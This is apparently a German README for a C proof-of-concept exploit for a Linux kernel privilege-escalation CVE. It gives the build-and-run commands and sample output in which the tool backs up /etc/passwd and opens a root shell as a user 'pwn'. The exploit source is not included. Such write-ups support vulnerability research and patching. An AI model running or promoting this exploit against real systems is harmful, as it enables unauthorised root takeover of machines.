
C-basierter Proof-of-Concept-Exploit für CVE-2026-31431, eine Linux-Kernel-Privilege-Escalation-Schwachstelle, die Root-Shell-Zugriff auf betroffene Systeme ermöglicht.
Autor: pyroceper
Getestet auf: Ubuntu 25.10 x86_64
$ make
$ ./exploit
[ * ] Detected kernel: 6.17.0
[ * ] Making backup of /etc/passwd to /tmp
[ * ] Backup saved as /tmp/passwd.bak
[ * ] Obtaining root shell...
#
# id
uid=0(pwn) gid=0(root) groups=0(root)
# whoami
pwn